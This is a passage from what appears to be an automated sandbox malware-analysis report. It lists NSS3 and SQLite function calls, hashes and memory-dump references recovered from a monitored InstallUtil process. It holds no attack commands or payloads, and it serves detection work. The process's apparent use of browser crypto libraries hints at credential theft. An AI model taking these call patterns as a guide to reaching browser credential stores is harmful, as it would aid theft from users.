                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                  • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                  • API String ID: 4221828374-3736768024
                                                                                                                  • Opcode ID: d3a0ea9dc0a2f023d73a363ed7a28c7d65989df9c16bd7c878a66093ffeb8b32
                                                                                                                  • Instruction ID: dc08b696c4d6c19232d17367dd14913fb683c51bee29f049f27d197dcca1c5e0
                                                                                                                  • Opcode Fuzzy Hash: d3a0ea9dc0a2f023d73a363ed7a28c7d65989df9c16bd7c878a66093ffeb8b32
                                                                                                                  • Instruction Fuzzy Hash: B701A2A170231137FA6027BD7F4AF66295C9F8315CF144931FE04E0A82EB92E624C1E5
                                                                                                                  Function 6C7A4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_SetErrorText.NSS3(00000000,00000000,?,6C7678F8), ref: 6C7A4E6D
                                                                                                                    • Part of subcall function 6C7409E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C7406A2,00000000,?), ref: 6C7409F8
                                                                                                                    • Part of subcall function 6C7409E0: malloc.MOZGLUE(0000001F), ref: 6C740A18
                                                                                                                    • Part of subcall function 6C7409E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C740A33
                                                                                                                  • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C7678F8), ref: 6C7A4ED9
                                                                                                                    • Part of subcall function 6C795920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C797703,?,00000000,00000000), ref: 6C795942
                                                                                                                    • Part of subcall function 6C795920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C797703), ref: 6C795954
                                                                                                                    • Part of subcall function 6C795920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C79596A
                                                                                                                    • Part of subcall function 6C795920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C795984
                                                                                                                    • Part of subcall function 6C795920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C795999
                                                                                                                    • Part of subcall function 6C795920: free.MOZGLUE(00000000), ref: 6C7959BA
                                                                                                                    • Part of subcall function 6C795920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C7959D3
                                                                                                                    • Part of subcall function 6C795920: free.MOZGLUE(00000000), ref: 6C7959F5
                                                                                                                    • Part of subcall function 6C795920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C795A0A
                                                                                                                    • Part of subcall function 6C795920: free.MOZGLUE(00000000), ref: 6C795A2E
                                                                                                                    • Part of subcall function 6C795920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C795A43
                                                                                                                  • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4EB3
                                                                                                                    • Part of subcall function 6C7A4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7A4EB8,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A484C
                                                                                                                    • Part of subcall function 6C7A4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7A4EB8,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A486D
                                                                                                                    • Part of subcall function 6C7A4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C7A4EB8,?), ref: 6C7A4884
                                                                                                                  • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4EC0
                                                                                                                    • Part of subcall function 6C7A4470: TlsGetValue.KERNEL32(00000000,?,6C767296,00000000), ref: 6C7A4487
                                                                                                                    • Part of subcall function 6C7A4470: EnterCriticalSection.KERNEL32(?,?,?,6C767296,00000000), ref: 6C7A44A0
                                                                                                                    • Part of subcall function 6C7A4470: PR_Unlock.NSS3(?,?,?,?,6C767296,00000000), ref: 6C7A44BB
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4F16
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4F2E
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4F40
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4F6C
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4F80
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4F8F
                                                                                                                  • PK11_UpdateSlotAttribute.NSS3(?,6C87DCB0,00000000), ref: 6C7A4FFE
                                                                                                                  • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C7A501F
                                                                                                                  • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A506B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 560490210-0
                                                                                                                  • Opcode ID: 20f447fb86ec3967b970c8705e89d73714af9993b522e0789ae2da621cc0affc
                                                                                                                  • Instruction ID: 2be2302cd84491b113fe33e1f5e51ae99acb44d41e6936baa923ca04c1e55312
                                                                                                                  • Opcode Fuzzy Hash: 20f447fb86ec3967b970c8705e89d73714af9993b522e0789ae2da621cc0affc
                                                                                                                  • Instruction Fuzzy Hash: 6D51F3B19006019BEB119FB5EE09AAB77B4FF0535CF184735E80686B12FB32D516CAD2
                                                                                                                  Function 6C74ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 786543732-0
                                                                                                                  • Opcode ID: 03524c9c0395163d74752f7b284b4260fc5699e9aefe261d749a2087148757c3
                                                                                                                  • Instruction ID: d6c5200bf8d7cf211c2d63efeb6d091962441636236140a21e8f2ea496e38f93
                                                                                                                  • Opcode Fuzzy Hash: 03524c9c0395163d74752f7b284b4260fc5699e9aefe261d749a2087148757c3
                                                                                                                  • Instruction Fuzzy Hash: 5451C1B0E011269BDF20DF98DE46AAE77B8BB0635CF148035D814A7B01E331AD15CBD6
                                                                                                                  Function 6C824C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • sqlite3_value_text16.NSS3(?), ref: 6C824CAF
                                                                                                                  • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C824CFD
                                                                                                                  • sqlite3_value_text16.NSS3(?), ref: 6C824D44
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                  • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                  • API String ID: 2274617401-4033235608
                                                                                                                  • Opcode ID: 4c3344b4fc1c258b55ef70d71ccd82974bd1537655ed28c5a58da0a6827eb0c6
                                                                                                                  • Instruction ID: ad20abff1f36f0aaa3ffff1d59f7fd6ea86fefcdc0ff09b41f8f5bcc703559c0
                                                                                                                  • Opcode Fuzzy Hash: 4c3344b4fc1c258b55ef70d71ccd82974bd1537655ed28c5a58da0a6827eb0c6
                                                                                                                  • Instruction Fuzzy Hash: 6C3177B2A09815A7E7384A28AB0C7A47721B7C2319F560D36C8244BF55C7BCACD5C7F2
                                                                                                                  Function 6C6F2450 Relevance: 19.2, APIs: 15, Instructions: 440COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F24BA
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6F250D
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F2554
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6F25A7
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F2609
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6F265F
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F26A2
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6F26F5
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F2764
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6F2898
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F28D0
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F2948
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6F299B
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F29E2
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6F2A31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$Enter$Leave
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2801635615-0
                                                                                                                  • Opcode ID: f098974fc287e597ca47c7975ba379b7c62757a454dcf65b8799cc4c57cf2486
                                                                                                                  • Instruction ID: 3cb51fcf1435f272705547c4532edee6bd5363836c7449457e0bf5120aee4481
                                                                                                                  • Opcode Fuzzy Hash: f098974fc287e597ca47c7975ba379b7c62757a454dcf65b8799cc4c57cf2486
                                                                                                                  • Instruction Fuzzy Hash: 3FF1CF31B015548BDB249FA1E99DA6E3732BF87319B18013DD8265BB11CB399843CFDA
                                                                                                                  Function 6C754880 Relevance: 18.2, APIs: 12, Instructions: 193memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7548A2
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C7548C4
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6C7548D8
                                                                                                                  • memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6C7548FB
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6C754908
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C754947
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C75496C
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C754988
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C878DAC,?), ref: 6C7549DE
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7549FD
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C754ACB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4201528089-0
                                                                                                                  • Opcode ID: 0d242a257e5b7208cd65f3f6790537df835985e2aa87e2a4502797a57bbe8087
                                                                                                                  • Instruction ID: 577d9ccca1a5a08d9c0b4144c86786a1b82deb4f2ed5990fd65226fb30e067c0
                                                                                                                  • Opcode Fuzzy Hash: 0d242a257e5b7208cd65f3f6790537df835985e2aa87e2a4502797a57bbe8087
                                                                                                                  • Instruction Fuzzy Hash: E55104B5A003018FEB608F66DE4979B36E4BF40308F544538E919ABB81EF71D438DB56
                                                                                                                  Function 6C822D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • sqlite3_initialize.NSS3 ref: 6C822D9F
                                                                                                                    • Part of subcall function 6C6DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C73F9C9,?,6C73F4DA,6C73F9C9,?,?,6C70369A), ref: 6C6DCA7A
                                                                                                                    • Part of subcall function 6C6DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6DCB26
                                                                                                                  • sqlite3_exec.NSS3(?,?,6C822F70,?,?), ref: 6C822DF9
                                                                                                                  • sqlite3_free.NSS3(00000000), ref: 6C822E2C
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C822E3A
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C822E52
                                                                                                                  • sqlite3_mprintf.NSS3(6C88AAF9,?), ref: 6C822E62
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C822E70
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C822E89
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C822EBB
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C822ECB
                                                                                                                  • sqlite3_free.NSS3(00000000), ref: 6C822F3E
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C822F4C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1957633107-0
                                                                                                                  • Opcode ID: 3b61d56f22ec6d07ef953760f5363da99a01095a7826525c514a7c37cc51d999
                                                                                                                  • Instruction ID: cea3ff171f6216ae1b909fb8f4ae72f638b4868a4b253f1cf2e0cfc5ef9b63d6
                                                                                                                  • Opcode Fuzzy Hash: 3b61d56f22ec6d07ef953760f5363da99a01095a7826525c514a7c37cc51d999
                                                                                                                  • Instruction Fuzzy Hash: 5061B1B5E102098BEB20CF68D988BDEB7B1EF49358F150824DC15A7701E739E895CBE5
                                                                                                                  Function 6C6D4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4C97
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CB0
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CC9
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4D11
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4D2A
                                                                                                                  • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4D4A
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4D57
                                                                                                                  • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4D97
                                                                                                                  • PR_Lock.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4DBA
                                                                                                                  • PR_WaitCondVar.NSS3 ref: 6C6D4DD4
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4DE6
                                                                                                                  • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4DEF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3388019835-0
                                                                                                                  • Opcode ID: 6867ff3df351ffaac944ff9975d72bc199dbc13d6f830525ba684a6e1fe426e1
                                                                                                                  • Instruction ID: f77785e154da7464491711df56f551460bc0cf33058de8c3927a0948e24261fb
                                                                                                                  • Opcode Fuzzy Hash: 6867ff3df351ffaac944ff9975d72bc199dbc13d6f830525ba684a6e1fe426e1
                                                                                                                  • Instruction Fuzzy Hash: 95418EB1A08616CFCB20AF78D1885697BF4BF06318F064679D8889B701E730EC85CBD9
                                                                                                                  Function 6C774E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C774E90
                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 6C774EA9
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C774EC6
                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 6C774EDF
                                                                                                                  • PL_HashTableLookup.NSS3 ref: 6C774EF8
                                                                                                                  • PR_Unlock.NSS3 ref: 6C774F05
                                                                                                                  • PR_Now.NSS3 ref: 6C774F13
                                                                                                                  • PR_Unlock.NSS3 ref: 6C774F3A
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                                  • String ID: bUwl$bUwl
                                                                                                                  • API String ID: 326028414-885062143
                                                                                                                  • Opcode ID: 21ffccb88345f0491cf8c5c59f81e51fa01725be1889b9a670f681fc47dc6398
                                                                                                                  • Instruction ID: 02c3b82d377686158ff6a76f55c655c63369fb0a8d4b14aca3f006e0a2349197
                                                                                                                  • Opcode Fuzzy Hash: 21ffccb88345f0491cf8c5c59f81e51fa01725be1889b9a670f681fc47dc6398
                                                                                                                  • Instruction Fuzzy Hash: 96416DB4A006099FCB10DF78C18486ABBF0FF49358B058569DC598B711EB30E855CFE1
                                                                                                                  Function 6C79ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C79DE64), ref: 6C79ED0C
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C79ED22
                                                                                                                    • Part of subcall function 6C7AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8818D0,?), ref: 6C7AB095
                                                                                                                  • PL_FreeArenaPool.NSS3(?), ref: 6C79ED4A
                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C79ED6B
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C79ED38
                                                                                                                    • Part of subcall function 6C6D4C70: TlsGetValue.KERNEL32(?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4C97
                                                                                                                    • Part of subcall function 6C6D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CB0
                                                                                                                    • Part of subcall function 6C6D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CC9
                                                                                                                  • SECOID_FindOID_Util.NSS3(?), ref: 6C79ED52
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C79ED83
